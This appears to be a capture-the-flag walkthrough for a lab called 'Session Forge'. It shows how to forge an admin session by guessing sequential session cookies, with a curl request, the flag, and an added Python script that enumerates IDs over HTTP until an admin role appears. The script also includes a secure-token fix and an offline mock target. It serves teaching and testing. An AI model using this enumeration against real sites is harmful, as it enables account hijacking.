hackr.gg — Official Walkthrough
Confidential · Educational Use Only

MemberZone — Session Forge

Session Security · Weak Session Token
Difficulty
Beginner
Vuln class
Weak Session Token
Steps
2
// Objective
Forge an admin session by replacing your predictable session cookie with the admin's ID.
// Tools required
Browser DevTools, curl
// Step-by-step walkthrough
1
Log in and inspect your session cookie
Log in as a regular user. Open DevTools → Application → Cookies. Note the session value — it's a simple numeric or sequential ID.
Command / Input
Cookie: session=1001
Predictable session IDs (sequential integers, usernames, timestamps, etc.) let anyone who holds one session guess every other one. A session token should be an opaque value of at least 128 bits drawn from a CSPRNG, with no relationship to the user ID or the order of login.
2
Try admin session IDs
Admin accounts are usually created first, so they sit at the lowest IDs. Count down from your own ID and try both forms the app might accept: the bare integer (session=1000) and the prefixed form (session=session_1000). Check the role field in the /api/me response for each attempt.
Command / Input
curl http://TARGET/api/me -H "Cookie: session=session_1000"
Output
{"user":"admin","role":"admin","flag":"HackrGG{s3ss10n_f0rg3d_4dm1n_4cc3ss}"}
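The two steps above, automated, as an added example that is not part of the hackr.gg walkthrough: it flags a cookie value as guessable (step 1), then counts down from the issued ID in both the bare and the session_-prefixed form until /api/me reports role "admin" (step 2), and shows the fix, a CSPRNG-generated token. The /api/me path and the Cookie: session=... format come from the walkthrough; the window size, the http_fetch transport, and the offline mock target (so the script runs without a live host) are assumptions.

```python
import json
import re
import secrets
from typing import Callable, Iterator, Optional
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# The endpoint the walkthrough's curl hits; the host is left as TARGET.
ME_PATH = "/api/me"

# Step 1 heuristic: a bare integer or "session_<n>" is a guessable token.
PREDICTABLE = re.compile(r"^(session_)?\d{1,10}$")


def looks_predictable(cookie_value: str) -> bool:
    """True when the session value is a sequential/numeric ID rather than random bytes."""
    return bool(PREDICTABLE.match(cookie_value))


def candidate_cookies(my_id: int, window: int = 50) -> Iterator[str]:
    """Step 2: walk downwards from the issued ID (admins are created first, so they sit low),
    yielding both formats the walkthrough tries: bare and 'session_' prefixed."""
    lowest = max(my_id - window, 0)
    for n in range(my_id - 1, lowest - 1, -1):
        yield str(n)
        yield f"session_{n}"


def http_fetch(url: str, cookie_value: str) -> Optional[dict]:
    """Real transport: GET url with 'Cookie: session=<value>'; parsed JSON or None on error."""
    req = Request(url, headers={"Cookie": f"session={cookie_value}"})
    try:
        with urlopen(req, timeout=5) as resp:
            return json.loads(resp.read().decode())
    except (HTTPError, URLError, ValueError):
        return None


def find_admin_session(
    base_url: str,
    my_id: int,
    fetch: Callable[[str, str], Optional[dict]] = http_fetch,
    window: int = 50,
):
    """Return (cookie_value, body) for the first candidate whose /api/me role is admin."""
    for value in candidate_cookies(my_id, window):
        body = fetch(base_url + ME_PATH, value)
        if body and body.get("role") == "admin":
            return value, body
    return None


def secure_session_id() -> str:
    """The fix: 256 bits from the OS CSPRNG, unrelated to user ID or login order."""
    return secrets.token_urlsafe(32)


# Constructed offline stand-in for the target (assumption): one user session and the
# admin session in the prefixed form the walkthrough's curl used.
MOCK_SESSIONS = {
    "1001": {"user": "bob", "role": "user"},
    "session_1000": {"user": "admin", "role": "admin"},
}


def mock_fetch(url: str, cookie_value: str) -> Optional[dict]:
    """Mock transport with the same signature as http_fetch, for running offline."""
    return MOCK_SESSIONS.get(cookie_value)


if __name__ == "__main__":
    print("my cookie is predictable:", looks_predictable("1001"))
    print("admin hit:", find_admin_session("http://TARGET", 1001, fetch=mock_fetch))
    print("what the server should have issued:", secure_session_id())
```

Against a live target, call find_admin_session("http://TARGET", 1001) so the default http_fetch is used; keep the window small, since every attempt is a logged request.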
// Flag
Flag value
HackrGG{s3ss10n_f0rg3d_4dm1n_4cc3ss}
Returned by /api/me when the admin session ID is sent.